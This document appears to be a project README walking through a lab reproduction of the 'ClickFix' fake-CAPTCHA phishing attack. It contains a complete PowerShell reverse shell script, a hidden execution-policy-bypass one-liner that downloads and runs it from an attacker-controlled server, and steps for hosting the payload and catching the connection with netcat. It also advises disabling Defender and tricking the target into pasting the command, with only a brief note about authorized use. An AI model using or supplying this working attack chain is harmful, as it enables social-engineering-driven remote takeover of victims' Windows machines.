CAPTCHA-and-Reverse-Shell

For this project, you will need a Linux VM and a Windows VM. I edited the script from John Hammond ReCAPTCHA Phish .

On Twitter, these are called "ClickFix", or Emmenhtal, used in LummaStealer campaigns observed by Unit42, Orange Cyberdefense, Huntress, and others.

Attack Vector: Copy and Paste

Prepare Your Files

You need two key files:

1. index.html: Your CAPTCHA-like interface. (JH Github)
2. reverse-shell.ps1: The PowerShell reverse shell script.

reverse-shell.ps1 File:

# PowerShell Reverse Shell Script $client = New-Object System.Net.Sockets.TcpClient('<YOUR_VM_IP>', 4444); $stream = $client.GetStream(); [byte[]]$buffer = 0..65535|%{0}; while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) { $data = (New-Object Text.UTF8Encoding).GetString($buffer, 0, $i); $result = (iex $data 2>&1 | Out-String); $send = ([text.encoding]::UTF8).GetBytes($result); $stream.Write($send, 0, $send.Length); } $client.Close();

Edit index.html to launch reverse shell payload (JH Github)

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://<YOUR_VM_IP>:8080/reverse-shell.ps1')";

3. Host Files Using Python’s Built-In HTTP Server

1. Install Python (if not already installed):

   Most Linux distributions come with Python pre-installed. Check by running:

   python3 --version

   If not installed, you can install it using:

   sudo apt update sudo apt install python3

2. Prepare Your Directory:

   Move to the directory where your index.html and reverse-shell.ps1 files are located.

   cd /path/to/your/files

3. Start the Python HTTP Server:

   Use Python’s built-in HTTP server to host your files. By default, it listens on port 8000, but you can choose another port if needed.

   python3 -m http.server 8080

4. Verify Hosting:

   Open a web browser and navigate to http://<YOUR_VM_IP>:8080. You should see your CAPTCHA-like page. The PowerShell script can be accessed at http://<YOUR_VM_IP>:8080/reverse-shell.ps1.

4. Testing

1. Open Your Browser: Visit http://<YOUR_VM_IP>:8080 to see your hosted CAPTCHA page.

2. Verify Access: Make sure that both the CAPTCHA page and the PowerShell script are accessible

5. Set Up a Listener on Your Linux VM

To catch the reverse shell connection from the target machine, you need to set up a listener on your Linux VM. You can use Netcat (nc) for this purpose.

1. Install Netcat (if not already installed):

   sudo apt update sudo apt install netcat

2. Start the Netcat Listener:

   Open a terminal and start a Netcat listener on the port you specified in your reverse shell script (e.g., 4444). Make sure you replace <YOUR_VM_IP> in your PowerShell script with your actual VM IP.

   nc -lvnp 4444

   This command listens on port 4444 and will display any incoming connections.

6. Deploy the Payload (DISABLE DEFENDER)

To get the reverse shell to connect back to your machine, you need the target to run the PowerShell command that you copied to their clipboard. Here’s a breakdown:

1. Ensure the Target Executes the Payload:

   When the target pastes and runs the command from their clipboard, it will download and execute the PowerShell script from your server. Ensure that you’ve communicated with the target in a way that gets them to execute this command. This might be done by social engineering or another method, but always remember that this should only be done in a legal context, such as a Capture The Flag (CTF) competition or with proper authorization.

2. Verify the Connection:

   Once the target executes the payload, you should see a connection in your Netcat terminal. You can then interact with the reverse shell by typing commands directly into the Netcat session.